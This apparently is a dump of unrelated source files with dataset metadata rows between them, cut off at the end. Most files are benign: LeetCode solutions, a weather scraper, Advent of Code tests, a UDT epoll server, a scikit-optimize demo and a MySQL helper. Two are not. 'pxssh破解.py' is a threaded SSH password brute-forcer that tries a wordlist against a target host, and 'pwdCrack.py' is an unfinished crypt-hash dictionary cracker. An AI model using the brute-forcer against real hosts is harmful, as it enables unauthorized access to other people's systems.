.. math:: R^2 = Q_{00} + Q_{11}
- Equation 7 from [S2005]_ to calculate the ellipticities:
.. math::
\\chi = \\frac{Q_{00}-Q_{11}+iQ_{01}+iQ_{10}}{R^2}
\\epsilon = \\frac{Q_{00}-Q_{11}+iQ_{01}+iQ_{10}}{R^2 +
2\\sqrt{(Q_{00}Q_{11} - Q_{01}Q_{10})}}
"""
# Calculate the size.
self.r2 = self.moments[0, 0] + self.moments[1, 1]
# Calculate the numerator
numerator = (self.moments[0, 0] - self.moments[1, 1] + np.complex(0,
self.moments[0, 1] + self.moments[1, 0]))
# Calculate the denominator
if self._ellip_type == 'epsilon':
denominator = (self.r2 + 2 * np.sqrt(self.moments[0, 0] *
self.moments[1, 1] - self.moments[0, 1] *
self.moments[1, 0]))
else:
denominator = self.r2
# Calculate the ellipticity
ellip = numerator / denominator
self.e = np.array([ellip.real, ellip.imag])
| true |
717c20366a4a162e6d12b71785e340a45bd59078
|
Python
|
hemeshwarkonduru/leetcode-codes
|
/Add Two Numbers.py
|
UTF-8
| 1,156 | 3.359375 | 3 |
[] |
no_license
|
# Definition for singly-linked list.
# class ListNode:
# def __init__(self, x):
# self.val = x
# self.next = None
class Solution:
def addTwoNumbers(self, l1: ListNode, l2: ListNode) -> ListNode:
p1=l1
p2=l2
c=0
        head=curr=ListNode(0) # dummy node to anchor the linked list; head.next is returned at the end
while (p1 or p2):
if(p1 is None):
v=p2.val+c
elif(p2 is None):
v=p1.val+c
else:
v=p1.val+p2.val+c
if(v>=10):
c=1
else:
c=0
curr.next=ListNode(v%10)
curr=curr.next
if(p1 is None):#when linkedlist1 ends but not ll2
p2=p2.next
elif(p2 is None):#when ll2 ends but not ll1
p1=p1.next
else:
p1=p1.next
p2=p2.next
        if(p1 is None and p2 is None and c==1 ): # this condition keeps the final carry from being dropped
curr.next=ListNode(c)
return head.next
| true |
b2c5b08407e17810ccdfa0e1deb58302426a77d9
|
Python
|
zbaolong/an
|
/cx_tqsk.py
|
UTF-8
| 1,254 | 2.9375 | 3 |
[] |
no_license
|
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
# Module for querying current weather observations.
__author__ = 'Andy'
import requests, os, sys
from bs4 import BeautifulSoup
# Parse the page at the given URL:
def getSoup(url):
soup_url = url
headers = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) ' 'Chrome/51.0.2704.63 Safari/537.36'}
content = requests.get(soup_url, headers=headers)
soup = BeautifulSoup(content.text, 'html.parser')
return soup
# Fetch the current weather observations:
def getWeather():
weather_url = "http://jnqx.jinan.gov.cn/jnszfqxj/front/zdz/list.do?type=1"
soup = getSoup(weather_url)
result = soup.find('div', align="center").find_all('td')
wlist = []
for w in result:
wlist.append(w.get_text())
#print wlist[18]
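    # wlist[16:24] hold station, time, temperature, humidity, wind direction,
    # wind speed, rainfall and pressure, in the order used in the message below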
weather_msg = u'地点:'+wlist[16].strip().strip('\n').strip('\t').strip('\r')+u'\n时间:'+wlist[17]+u'\n温度:'+wlist[18].strip().strip('.')+u'℃'+u'\n湿度:'+wlist[19].strip()+u'%'+u'\n风向:'+wlist[20]+u'\n风速:'+wlist[21].strip()+u'm/s'+u'\n雨量:'+wlist[22].strip()+u'mm/h'+u'\n气压:'+wlist[23].strip()+u'hPa'+'\n'
#print weather_msg
return weather_msg
if __name__ == '__main__':
print getWeather()
| true |
91497b0b3d30e757eacc39d090e45d60c7487f60
|
Python
|
netsill/web-Safety
|
/python/pxssh破解.py
|
UTF-8
| 2,054 | 2.625 | 3 |
[] |
no_license
|
#coding=utf-8
import pxssh
import optparse
import time
import threading
MaxConnections = 5
ConnectLock = threading.BoundedSemaphore(value = MaxConnections)
Found = False
Fails = 0
def Connect(Host,User,Password,Release):
global Found,Fails
try:
Ssh = pxssh.pxssh()
Ssh.login(Host,User,Password)
print('[+]Password Found:'+Password)
Found = True
except Exception as e:
if'read_noneblocking' in str(e):
Fails += 1
time.sleep(5)
Connect(Host,User,Password,False)
elif'synchronize with original prompt' in str(e):
time.sleep(1)
Connect(Host,User,Password,False)
finally:
if Release:
ConnectLock.release()
def main():
parser = optparse.OptionParser('usage%prog '+'-H <target host> '
'-u <user> -f <password list>')
parser.add_option('-H', dest='TargetHost', type='string', help='specify target host')
parser.add_option('-f', dest='passwdFile', type='string',
help='specify password file')
parser.add_option('-u',dest='user',type='string',help = 'specify the user' )
(Options,args) = parser.parse_args()
Host = Options.TargetHost__
PasswordFile = Options.PasswordFile
User=Options.user
if Host == None or PasswordFile == None or User == None:
print(parser.usage)
exit(0)
Fn = open(PasswordFile,'r')
for Line in Fn.readlines():
if Found:
print("[*]Exiting : PasswordFound")
exit(0)
if Fails > 5:
print("[!]Exiting:Too Many Socket Timeouts")
exit(0)
ConnectLock.acquire()
Password = Line.strip('\r').strip('\n')
print("[-]Testing:"+str(Password))
t = threading.Thread(target = Connect,args=(Host,
User,Password,True))
t.start()
if __name__ == "__main__":
main()
| true |
71890b0a8a271c9fb6d035d116fea3236f7f5447
|
Python
|
Darainer/AdventOfCode2019
|
/IntCode_tests.py
|
UTF-8
| 3,946 | 2.625 | 3 |
[] |
no_license
|
import unittest
from IntCode import IntCode
from Day2_IntCode.Day2_1202_Program_Alarm import find_inputs_for_computeResult
from Day7_Amplification_Circuit.AmplificationConfig import CalculateMaxAmplification, FeedbackAmplification
class Day2_part1(unittest.TestCase):
def test_something(self):
input_program = 'Day2_IntCode/Real_program_codes.txt'
myIntcoder = IntCode(input_program)
myIntcoder.program_codes[1] = 12
myIntcoder.program_codes[2] = 2
myIntcoder.compute_program()
ret = myIntcoder.program_codes[0]
self.assertEqual(4138658, ret )
class Day2_part2(unittest.TestCase):
def test_something(self):
input_program = 'Day2_IntCode/Real_program_codes.txt'
myIntcoder = IntCode(input_program)
ret = find_inputs_for_computeResult(myIntcoder,0, 99, 19690720)
self.assertEqual(ret, 7264)
class Day5_part1(unittest.TestCase):
def test_something(self):
Input_day5 = 'Day5_Sunny_with_Asteroids/Day_5_input.txt'
Intcoder = IntCode(Input_day5)
Intcoder.run_Intcode_with_input(1)
ret = Intcoder.output
self.assertEqual(7988899,ret[-1])
class Day5_part2(unittest.TestCase):
def test_something(self):
Input_day5 = 'Day5_Sunny_with_Asteroids/Day_5_input.txt'
Intcoder = IntCode(Input_day5)
Intcoder.run_Intcode_with_input(5)
ret = Intcoder.output
self.assertEqual(13758663, ret[-1])
class Day7_part1(unittest.TestCase):
def test_something(self):
phase_codes = [0, 1, 2, 3, 4]
input_program = 'Day7_Amplification_Circuit/Day7_AMP_input_program.txt'
Max_Thruster_output = CalculateMaxAmplification(input_program, phase_codes)
print('Max_Thruster_output', Max_Thruster_output)
self.assertEqual(225056, Max_Thruster_output)
class Day7Partb_Complete_program(unittest.TestCase):
def test_something(self):
phase_codes = [5, 6, 7, 8, 9]
input_program = 'Day7_Amplification_Circuit/Day7_AMP_input_program.txt'
Max_Thruster_output = FeedbackAmplification(input_program, phase_codes)
print('Max_Thruster_output', Max_Thruster_output)
self.assertEqual(14260332, Max_Thruster_output)
class Day9_part1testcase(unittest.TestCase):
def test_something(self):
input_program = [109,1,204,-1,1001,100,1,100,1008,100,16,101,1006,101,0,99]
myIntCoder = IntCode(input_program)
program_output = myIntCoder.run_Intcode_with_input_output([])
self.assertEqual(input_program, program_output)
class Day9_part1testcase2(unittest.TestCase):
def test_something(self):
input_program = [1102,34915192,34915192,7,4,7,99,0]
myIntCoder = IntCode(input_program)
program_output = myIntCoder.run_Intcode_with_input_output([])
self.assertEqual(len(str(abs(program_output[0]))),16)
class Day9_part1testcase3(unittest.TestCase):
def test_something(self):
input_program = [104,1125899906842624,99]
myIntCoder = IntCode(input_program)
program_output = myIntCoder.run_Intcode_with_input_output([])
self.assertEqual(1125899906842624,program_output[0])
class Day9_part1(unittest.TestCase):
def test_something(self):
input_program = 'Day_9_Sensor_Boost/Day9_input.txt'
myIntCoder = IntCode(input_program)
program_output = myIntCoder.run_Intcode_with_input_output(1)
print('Boost Keycode', program_output)
self.assertEqual(int, type(program_output[0]))
class Day9_part2(unittest.TestCase):
def test_something(self):
input_program = 'Day_9_Sensor_Boost/Day9_input.txt'
myIntCoder = IntCode(input_program)
program_output = myIntCoder.run_Intcode_with_input_output(2)
print('coordinates of the distress signal', program_output)
self.assertEqual(int, type(program_output[0]))
if __name__ == '__main__':
unittest.main()
| true |
bf9361ac4af0f24c8ea28328a829911d05777963
|
Python
|
joojaeyoon/PS
|
/BOJ/3000-4000/3078/3078.py
|
UTF-8
| 324 | 2.75 | 3 |
[] |
no_license
|
import sys
from collections import deque
N, K = map(int, input().split())
answer = 0
q = [deque([]) for _ in range(21)]
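# one deque per word length (index 0..20); each holds the indices of earlier words of that length still within distance K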
for i in range(N):
length = len(sys.stdin.readline())-1
while q[length] and i-q[length][0] > K:
q[length].popleft()
answer += len(q[length])
q[length].append(i)
print(answer)
| true |
bf1ba1d77c5526d50d8fb0ca12158416ffb30753
|
Python
|
upgradeb/ViolentPython
|
/Chapter01/pwdCrack.py
|
UTF-8
| 840 | 2.875 | 3 |
[] |
no_license
|
#! /usr/bin/env python
# -*- coding: utf-8 -*-
import crypt
import hashlib
import sys
def EnCrypt(word, salt):
cryptWord = crypt.crypt(word, salt)
print(cryptWord)
return cryptWord
def testPass(cryptPass):
salt = cryptPass[0:2]
dictFile = open('key.txt', 'r')
for word in dictFile.readlines():
word = word.strip('\n')
cryptWord = crypt.crypt(word, salt)
# print(cryptWord)
def main():
passFile = open('password.txt')
for line in passFile.readlines():
if ":" in line:
user = line.split(':')[0]
cryptPass = line.split(':')[1].strip(' ')
print("[*] Cracking Password For: " + user + "\n")
testPass(cryptPass)
if __name__ == "__main__":
# main()
EnCrypt('toor', '$6$SZESLPWZ')
# EnSha512('toor', '$6$ZESLPWZ$')
| true |
eb7696cef736b34b6440462fcac3cc7c4ab2e133
|
Python
|
srikanthpragada/25_FEB_2019_PYTHONDEMO
|
/oop/sum_of_nums.py
|
UTF-8
| 149 | 4.09375 | 4 |
[] |
no_license
|
sum = 0
for i in range(1, 6):
try:
num = int(input("Enter number :"))
sum += num
except:
pass
print(f"Sum = {sum}")
| true |
84eeecab695d7301ed1437208981589a3b6162f9
|
Python
|
scikit-optimize/scikit-optimize.github.io
|
/0.7/_downloads/2f6e22007265fe3158cce44853e94a58/strategy-comparison.py
|
UTF-8
| 4,632 | 3.40625 | 3 |
[] |
permissive
|
"""
==========================
Comparing surrogate models
==========================
Tim Head, July 2016.
Reformatted by Holger Nahrstaedt 2020
.. currentmodule:: skopt
Bayesian optimization or sequential model-based optimization uses a surrogate
model to model the expensive to evaluate function `func`. There are several
choices for what kind of surrogate model to use. This notebook compares the
performance of:
* gaussian processes,
* extra trees, and
* random forests
as surrogate models. A purely random optimization strategy is also used as
a baseline.
"""
print(__doc__)
import numpy as np
np.random.seed(123)
import matplotlib.pyplot as plt
#############################################################################
# Toy model
# =========
#
# We will use the :class:`benchmarks.branin` function as toy model for the expensive function.
# In a real world application this function would be unknown and expensive
# to evaluate.
from skopt.benchmarks import branin as _branin
def branin(x, noise_level=0.):
return _branin(x) + noise_level * np.random.randn()
#############################################################################
from matplotlib.colors import LogNorm
def plot_branin():
fig, ax = plt.subplots()
x1_values = np.linspace(-5, 10, 100)
x2_values = np.linspace(0, 15, 100)
x_ax, y_ax = np.meshgrid(x1_values, x2_values)
vals = np.c_[x_ax.ravel(), y_ax.ravel()]
fx = np.reshape([branin(val) for val in vals], (100, 100))
cm = ax.pcolormesh(x_ax, y_ax, fx,
norm=LogNorm(vmin=fx.min(),
vmax=fx.max()))
minima = np.array([[-np.pi, 12.275], [+np.pi, 2.275], [9.42478, 2.475]])
ax.plot(minima[:, 0], minima[:, 1], "r.", markersize=14,
lw=0, label="Minima")
cb = fig.colorbar(cm)
cb.set_label("f(x)")
ax.legend(loc="best", numpoints=1)
ax.set_xlabel("X1")
ax.set_xlim([-5, 10])
ax.set_ylabel("X2")
ax.set_ylim([0, 15])
plot_branin()
#############################################################################
# This shows the value of the two-dimensional branin function and
# the three minima.
#
#
# Objective
# =========
#
# The objective of this example is to find one of these minima in as
# few iterations as possible. One iteration is defined as one call
# to the :class:`benchmarks.branin` function.
#
# We will evaluate each model several times using a different seed for the
# random number generator. Then compare the average performance of these
# models. This makes the comparison more robust against models that get
# "lucky".
from functools import partial
from skopt import gp_minimize, forest_minimize, dummy_minimize
func = partial(branin, noise_level=2.0)
bounds = [(-5.0, 10.0), (0.0, 15.0)]
n_calls = 60
#############################################################################
def run(minimizer, n_iter=5):
return [minimizer(func, bounds, n_calls=n_calls, random_state=n)
for n in range(n_iter)]
# Random search
dummy_res = run(dummy_minimize)
# Gaussian processes
gp_res = run(gp_minimize)
# Random forest
rf_res = run(partial(forest_minimize, base_estimator="RF"))
# Extra trees
et_res = run(partial(forest_minimize, base_estimator="ET"))
#############################################################################
# Note that this can take a few minutes.
from skopt.plots import plot_convergence
plot = plot_convergence(("dummy_minimize", dummy_res),
("gp_minimize", gp_res),
("forest_minimize('rf')", rf_res),
                        ("forest_minimize('et')", et_res),
true_minimum=0.397887, yscale="log")
plot.legend(loc="best", prop={'size': 6}, numpoints=1)
#############################################################################
# This plot shows the value of the minimum found (y axis) as a function
# of the number of iterations performed so far (x axis). The dashed red line
# indicates the true value of the minimum of the :class:`benchmarks.branin` function.
#
# For the first ten iterations all methods perform equally well as they all
# start by creating ten random samples before fitting their respective model
# for the first time. After iteration ten the next point at which
# to evaluate :class:`benchmarks.branin` is guided by the model, which is where differences
# start to appear.
#
# Each minimizer only has access to noisy observations of the objective
# function, so as time passes (more iterations) it will start observing
# values that are below the true value simply because they are fluctuations.
| true |
0660a760a158a0aefde75aa79c9aab969d9238ab
|
Python
|
Tchekda/IVAOWrapper
|
/ivao/pilot.py
|
UTF-8
| 5,549 | 2.53125 | 3 |
[
"MIT"
] |
permissive
|
from .client import Client
class Pilot(Client):
def __init__(self, callsign, vid, latitude, longitude, altitude, server, connection_time, soft_name, soft_version,
admin_rating, client_rating, groundspeed, aircraft, cruise_speed, departure_airport, cruise_level,
destination_airport, transponder, flight_rule, departure_time, actual_departure_time,
alternate_airport, fpl_remark, route, flight_type, passengers, heading, ground, simulator):
"""
Create a Pilot Object from string parsed in the Whazzup file, so all data is considered as a string
:param callsign: Callsign of the controller (LFBD_TWR)
:param vid: Client's VID (485573)
:param latitude: Latitude of the center of the control zone
:param longitude: Longitude of the center of the control zone
:param altitude: Altitude of ther center of the control zone
:param server: Server to which the client is connected (EU7)
:param connection_time: Date and time, the client connected to the server
:param soft_name: Name of the software used by the client
:param soft_version: Version of the software used by the client
:param admin_rating: Administrative rating
:param client_rating: Pilot rank
:param groundspeed: The groundspeed of the pilot.
:param aircraft: According to ICAO flightplan specifications. (1/C172/L-CS/C)
:param cruise_speed: According to ICAO flightplan specifications.
:param departure_airport: According to ICAO flightplan specifications.
:param cruise_level: According to ICAO flightplan specifications.
:param destination_airport: According to ICAO flightplan specifications.
:param transponder: The transponder code set by the pilot.
:param flight_rule: According to ICAO flightplan specifications.
:param departure_time: According to ICAO flightplan specifications.
:param actual_departure_time: The actual departure time.
:param alternate_airport: According to ICAO flightplan specifications.
:param fpl_remark: According to ICAO flightplan specifications.
:param route: According to ICAO flightplan specifications.
:param flight_type: According to ICAO flightplan specifications.
:param passengers: According to ICAO flightplan specifications.
:param heading: The heading of the plane.
:param ground: A flag indicating if the plane is on ground or not.
:param simulator: The simulator used by the pilot.
"""
super().__init__(callsign=callsign, vid=vid, client_type="PILOT", latitude=latitude, longitude=longitude,
altitude=altitude, server=server, connection_time=connection_time,
soft_name=soft_name, soft_version=soft_version, admin_rating=admin_rating,
client_rating=client_rating)
self.destination_airport = destination_airport
self.simulator = int(simulator)
if ground == "1":
self.ground = True
else:
self.ground = False
self.heading = int(heading)
if passengers != '':
self.passengers = int(passengers)
else:
self.passengers = 0
self.flight_type = flight_type
if groundspeed != '':
self.groundspeed = int(groundspeed)
else:
self.groundspeed = 0
self.aircraft = aircraft
self.cruise_speed = cruise_speed
self.atis = departure_airport
self.atis_time = cruise_level
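        # note: the departure airport and cruise level end up stored in self.atis and
        # self.atis_time here; the attribute names look like a carry-over from an ATC client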
self.transponder = int(transponder)
self.flight_rule = flight_rule
self.departure_time = departure_time
self.actual_departure_time = actual_departure_time
self.alternate_airport = alternate_airport
self.fpl_remark = fpl_remark
self.route = route
def get_simulator_name(self):
"""
Get the name of the simulator used by the pilot
:return: str
"""
return {
0: "Unknown",
1: "Microsoft Flight Simulator 95",
2: "Microsoft Flight Simulator 98",
3: "Microsoft Combat Flight Simulator",
4: "Microsoft Flight Simulator 2000",
5: "Microsoft Combat Flight Simulator 2",
6: "Microsoft Flight Simulator 2002",
7: "Microsoft Combat Flight Simulator 3",
8: "Microsoft Flight Simulator 2004",
9: "Microsoft Flight Simulator X",
11: "X-Plane",
12: "X-Plane 8",
13: "X-Plane 9",
14: "X-Plane 10",
15: "PS1",
16: "X-Plane 11",
17: "X-Plane 12", # Really???
20: "Fly!",
21: "Fly! 2",
25: "Prepar3D",
30: "Prepar3D 1.x"
}.get(self.simulator, 'Unknown')
def get_client_rating_name(self):
"""
Get the name of the pilot rank on the network
:return: str
"""
return {
1: "Observer",
2: "Basic Flight Student (FS1)",
3: "Flight Student (FS2)",
4: "Advanced Flight Student (FS3)",
5: "Private Pilot (PP)",
6: "Senior Private Pilot (SPP)",
7: "Commercial Pilot (CP)",
8: "Airline Transport Pilot (ATP)",
9: "Senior Flight Instructor (SFI)",
10: "Chief Flight Instructor (CFI)"
}.get(self.client_rating, None)
| true |
99a4c1c90c76e8c353a5ccb5c0abba75e78b17e4
|
Python
|
bchretien/PyUDT
|
/legacy/example/pyudt/epoll/server.py
|
UTF-8
| 4,097 | 2.578125 | 3 |
[] |
no_license
|
#!/usr/bin/env python
"""
:module udtserver
"""
import struct
import udt4 as udt
from udt4 import pyudt
import socket as socklib
from subprocess import Popen
import sys
def configure_epoll(udt_clients, sys_clients):
epoll = pyudt.Epoll()
for client in udt_clients:
epoll.add_usock(client, udt.UDT_EPOLL_IN)
for client in sys_clients:
epoll.add_ssock(client, udt.UDT_EPOLL_IN)
return epoll
def clean_epoll(epoll, udt_clients, sys_clients):
for client in udt_clients:
epoll.remove_usock(client, udt.UDT_EPOLL_IN)
for client in sys_clients:
epoll.remove_ssock(client, udt.UDT_EPOLL_IN)
def acquire_udt_clients(serv_addr, serv_port, count):
print('Acquiring UDT clients')
udt_serv = pyudt.UdtSocket()
udt_serv.bind( (serv_addr, serv_port) )
udt_serv.listen(100)
clients = []
for i in xrange(count):
Popen('./client.py %(host)s %(protocol)s %(port)i ' % {
'host' : serv_addr, 'port' : serv_port, 'protocol' : 'udt' },
shell = True
)
socket, client_addr = udt_serv.accept()
clients.append(socket)
return udt_serv, clients
def acquire_tcp_clients(serv_addr, serv_port, count):
print('Acquiring TCP clients')
tcp_serv = socklib.socket()
tcp_serv.bind( (serv_addr, serv_port) )
tcp_serv.listen(100)
clients = []
for i in xrange(count):
Popen('./client.py %(host)s %(protocol)s %(port)i ' % {
'host' : serv_addr, 'port' : serv_port, 'protocol' : 'tcp' },
shell = True
)
socket, client_addr = tcp_serv.accept()
clients.append(socket)
return tcp_serv, clients
def handle_socket_uset(epoll, sock_set):
"""
Ideally this function should work for both UdtSocket type and socket.socket
type.
standard:
4 byte - version
8 byte - length
k byte - message
"""
for sock in sock_set:
integer = sock.recv(4)
if integer:
try:
version = struct.unpack('i', integer)
msg_len = struct.unpack('l', sock.recv(8))[0]
msg = sock.recv(msg_len)
except:
sys.stderr.write('UDT socket closed')
epoll.remove_usock(sock)
continue
else:
print('UDT message: ' + msg)
def handle_socket_sset(epoll, sock_set):
"""
Ideally this function should work for both UdtSocket type and socket.socket
type.
standard:
4 byte - version
8 byte - length
k byte - message
"""
for sock in sock_set:
integer = sock.recv(4)
if integer:
try:
version = struct.unpack('i', integer)
msg_len = struct.unpack('l', sock.recv(8))[0]
msg = sock.recv(msg_len)
except:
sys.stderr.write('TCP socket closed')
epoll.remove_ssock(sock)
continue
else:
print('TCP message: ' + msg)
def main():
"""
"""
udt.startup()
udt_serv, udt_clients = acquire_udt_clients('127.0.0.1', 4001, 3)
tcp_serv, tcp_clients = acquire_tcp_clients('127.0.0.1', 4002, 3)
print('Configuring epoll')
epoll = configure_epoll(udt_clients, tcp_clients)
print('Reading messages')
i = 0
while True:
sets = epoll.wait(True, False, 10000, True, False)
handle_socket_uset(epoll, sets[0])
handle_socket_uset(epoll, sets[1])
handle_socket_sset(epoll, sets[2])
handle_socket_sset(epoll, sets[3])
if len(sets[0]) == 0:
i += 1
if i == 12:
print('... done!')
break
print('Cleaning epoll')
clean_epoll(epoll, udt_clients, tcp_clients)
print('Closing sockets')
for client in udt_clients:
client.close()
for client in tcp_clients:
client.close()
udt_serv.close()
tcp_serv.close()
udt.cleanup()
if __name__ == '__main__':
from sys import exit
exit(main())
| true |
d8ff438375b4bdd79ecfba103c5f65afd2bcb714
|
Python
|
MengSunS/daily-leetcode
|
/fb高频/211.py
|
UTF-8
| 1,207 | 3.734375 | 4 |
[] |
no_license
|
import collections  # provides the defaultdict used below
class TrieNode():
def __init__(self):
self.children = collections.defaultdict(TrieNode)
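        # defaultdict(TrieNode) creates a missing child node automatically on first access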
self.isWord = False
class WordDictionary:
def __init__(self):
"""
Initialize your data structure here.
"""
self.root = TrieNode()
def addWord(self, word: str) -> None:
node = self.root
for ch in word:
node = node.children[ch]
node.isWord = True
def search(self, word: str) -> bool:
node = self.root
return self.dfs(node, 0, word)
def dfs(self, node, i, word):
if i == len(word):
if node.isWord:
return True
return False
if word[i] == '.':
for n in node.children.values():
if self.dfs(n, i + 1, word):
return True
else:
node = node.children.get(word[i])
if not node:
return False
return self.dfs(node, i + 1, word)
# Your WordDictionary object will be instantiated and called as such:
# obj = WordDictionary()
# obj.addWord(word)
# param_2 = obj.search(word)
| true |
b19ccfc2ae58230bad4a2218cf0890e0023681af
|
Python
|
IgorxutStepikOrg/AlgorithmsTheoryAndPracticeMethods
|
/Module8_2/Step 6/python/solution.py
|
UTF-8
| 973 | 2.96875 | 3 |
[] |
no_license
|
def func(len, list):
P = [0] * len
M = [0] * (len + 1)
L = 0
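    # patience-sorting style LIS: M[l] holds the index of the tail element of the best
    # subsequence of length l, and P[i] stores the predecessor of i for reconstruction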
list = list[:: -1]
for i in range(len):
lo = 1
hi = L
while lo <= hi:
mid = (lo + hi) // 2
if list[M[mid]] < list[i]:
lo = mid + 1
elif list[M[mid]] == list[i]:
lo += 1
else:
hi = mid - 1
newL = lo
P[i] = M[newL - 1]
if newL > L:
M[newL] = i
L = newL
elif list[i] < list[M[newL]]:
M[newL] = i
    # reconstruct the solution
result = [0] * L
k = M[L]
for i in range(L - 1, -1, -1):
result[i] = len - k
k = P[k]
return result
def main():
n = int(input())
A = [int(i) for i in input().split()]
result = func(n, A)
print("{0}\n{1}".format(len(result), " ".join(map(str, result[::-1]))))
if __name__ == "__main__":
main()
| true |
e53df48b9eec7de6de631439daca0dd07219d51f
|
Python
|
Aasthaengg/IBMdataset
|
/Python_codes/p03796/s181516620.py
|
UTF-8
| 84 | 2.65625 | 3 |
[] |
no_license
|
import math
N = int(input())
N = math.factorial(N)
N = (N % (1000000000+7))
print(N)
| true |
7a4474272ecae5659cdc018cd2331f9908463903
|
Python
|
FoFxjc/ChangXing-Tool
|
/utils/mysql.py
|
UTF-8
| 10,778 | 3 | 3 |
[] |
no_license
|
# coding=utf-8
"""
Crawler toolkit - base utilities: MySQL database helper functions
"""
import re
import mysql.connector
def select_by_sql(host: str, user: str, password: str, database: str, sql: str, columns: list,
use_unicode: bool = True):
"""
    :param host: <str> URL of the MySQL database host
    :param user: <str> username used to access the MySQL database
    :param password: <str> password used to access the MySQL database
    :param database: <str> name of the MySQL database to read from
    :param sql: <str> SQL statement used to read the data
    :param columns: <str> names of the columns to read
    :param use_unicode: <bool> whether to set the use_unicode parameter when connecting to MySQL (default True)
    :return: <list> the retrieved rows
"""
mysql_database = mysql.connector.connect(host=host, user=user, password=password, database=database,
                                             use_unicode=use_unicode)  # connect to the MySQL database
    mysql_cursor = mysql_database.cursor()  # get a cursor for the database
    mysql_cursor.execute(sql)  # build and run the SELECT statement
    mysql_results = mysql_cursor.fetchall()  # fetch all rows returned by the SQL statement
select_result = []
for mysql_result in mysql_results: # 遍历:SQL语句检索的各行记录
if len(columns) > 1: # 处理读取字段数超过1个的情况
select_item = []
for i in range(len(columns)):
select_item.append(mysql_result[i])
select_result.append(select_item)
elif len(columns) == 1: # 处理读取字段数为1个的情况
select_result.append(mysql_result[0])
mysql_database.shutdown()
return select_result
def select(host: str, user: str, password: str, database: str, table: str, columns: list,
use_unicode: bool = True, sql_where: str = ""):
""" SELECT读取MySQL数据库的数据
:param host: <str> MySQL数据库主机的Url
:param user: <str> MySQL数据库的访问用户名
:param password: <str> MySQL数据库的访问密码
:param database: <str> 需要读取的MySQL数据库名称
:param table: <str> 需要读取的MySQL数据表名称
:param columns: <list:str> 需要读取的字段名称列表
:param use_unicode: <bool> 是否设置MySQL数据库链接时的use_unicode参数,默认为True
:param sql_where: <str> 在执行SELECT语句时是否添加WHERE子句(默认为空,如添加应以WHERE开头)
:return: <list> 读取的数据结果
"""
    mysql_database = mysql.connector.connect(host=host, user=user, password=password, database=database,
                                             use_unicode=use_unicode)  # connect to the MySQL database
    mysql_cursor = mysql_database.cursor()  # get a cursor for database operations
    mysql_cursor.execute(sql_select(table, columns, sql_where))  # build and execute the SELECT statement
    mysql_results = mysql_cursor.fetchall()  # fetch all rows returned by the statement
    select_result = []
    for mysql_result in mysql_results:  # iterate over the retrieved rows
        if len(columns) > 1:  # more than one requested column
            select_item = []
            for i in range(len(columns)):
                select_item.append(mysql_result[i])
            select_result.append(select_item)
        elif len(columns) == 1:  # exactly one requested column
            select_result.append(mysql_result[0])
mysql_database.shutdown()
return select_result
def create(host: str, user: str, password: str, sql: str):
""" CREATE创建数据表到MySQL数据库
:param host: <str> MySQL数据库主机的Url
:param user: <str> MySQL数据库的访问用户名
:param password: <str> MySQL数据库的访问密码
:param sql: <str> 创建数据表的SQL语句
"""
mysql_database = mysql.connector.connect(host=host, user=user, password=password) # 链接到MySQL数据库
mysql_cursor = mysql_database.cursor()
mysql_cursor.execute(sql)
return True
def execute(host: str, user: str, password: str, database: str, sql: str):
""" 执行SQL语句
:param host: <str> MySQL数据库主机的Url
:param user: <str> MySQL数据库的访问用户名
:param password: <str> MySQL数据库的访问密码
:param database: <str> MYSQL数据库的名称
:param sql: <str> 创建数据表的SQL语句
:return:
"""
mysql_database = mysql.connector.connect(host=host, user=user, password=password, database=database)
mysql_cursor = mysql_database.cursor()
    mysql_cursor.execute(sql)  # execute the SQL statement
    mysql_database.commit()  # commit the change
return mysql_cursor.rowcount
def insert(host: str, user: str, password: str, database: str, table: str, data: list, use_unicode: bool = True):
""" INSERT写入数据到MySQL数据库
:param host: <str> MySQL数据库主机的Url
:param user: <str> MySQL数据库的访问用户名
:param password: <str> MySQL数据库的访问密码
:param database: <str> 需要写入的MySQL数据库名称
:param table: <str> 需要写入的MySQL数据表名称
:param data: <list:list> 需要写入的多条记录(所有记录的字段名与第一条记录的字段名统一)
:param use_unicode: <bool> 是否设置MySQL数据库链接时的use_unicode参数,默认为True
:return: <bool> 写入数据是否成功
"""
    if len(data) == 0:  # nothing to write
        return 0
    mysql_database = mysql.connector.connect(
        host=host, user=user, password=password, database=database, use_unicode=use_unicode)  # connect to the MySQL database
    mysql_cursor = mysql_database.cursor()
    sql, val = sql_insert(table, data)
    mysql_cursor.executemany(sql, val)  # execute the SQL statement
    mysql_database.commit()  # commit the inserted rows
return mysql_cursor.rowcount
def insert_pure(host: str, user: str, password: str, database: str, table: str, data: list, use_unicode: bool = True):
""" INSERT写入数据到MySQL数据库(使用纯粹SQL语句)
:param host: <str> MySQL数据库主机的Url
:param user: <str> MySQL数据库的访问用户名
:param password: <str> MySQL数据库的访问密码
:param database: <str> 需要写入的MySQL数据库名称
:param table: <str> 需要写入的MySQL数据表名称
:param data: <list:list> 需要写入的多条记录(所有记录的字段名与第一条记录的字段名统一)
:param use_unicode: <bool> 是否设置MySQL数据库链接时的use_unicode参数,默认为True
:return: <bool> 写入数据是否成功
"""
    if len(data) == 0:  # nothing to write
        return 0
    mysql_database = mysql.connector.connect(
        host=host, user=user, password=password, database=database, use_unicode=use_unicode)  # connect to the MySQL database
    mysql_cursor = mysql_database.cursor()
    sql = sql_insert_pure(table, data)
    # print(sql)
    mysql_cursor.execute(sql)  # execute the SQL statement
    mysql_database.commit()  # commit the inserted rows
return mysql_cursor.rowcount
def sql_select(table: str, columns: list, where: str = ""):
""" [生成SQL语句]SELECT语句
:param table: <str> 需要SELECT的表单名称
:param columns: <list:str> 需要读取的字段名称列表
:param where: <str> 在SELECT时执行的WHERE子句(默认为空,如添加应以WHERE开头)
:return: <str> 生成完成的SELECT(MySQL)语句
"""
sql = "SELECT "
for column in columns:
sql += column + ","
return re.sub(",$", " FROM " + table + " " + where, sql)
def sql_insert(table: str, data: list):
""" [生成SQL语句]INSERT语句
:param table: <str> 需要写入的MySQL数据表名称
:param data: <list:list> 需要写入的多条记录(所有记录的字段名与第一条记录的字段名统一)
:return: <str> SQL语句部分, <list> 写入数据部分 / <None> 需要写入的数据存在问题
"""
if len(data) == 0:
return None
    # Build the SQL statement
    column_list = []
    column_part = ""  # column-name part of the SQL statement
    value_part = ""  # placeholder part of the SQL statement
    for column in data[0]:
        column_list.append([column, type(data[0][column])])
        column_part += "`" + column + "`,"
        # mysql.connector only accepts %s placeholders, whatever the value type,
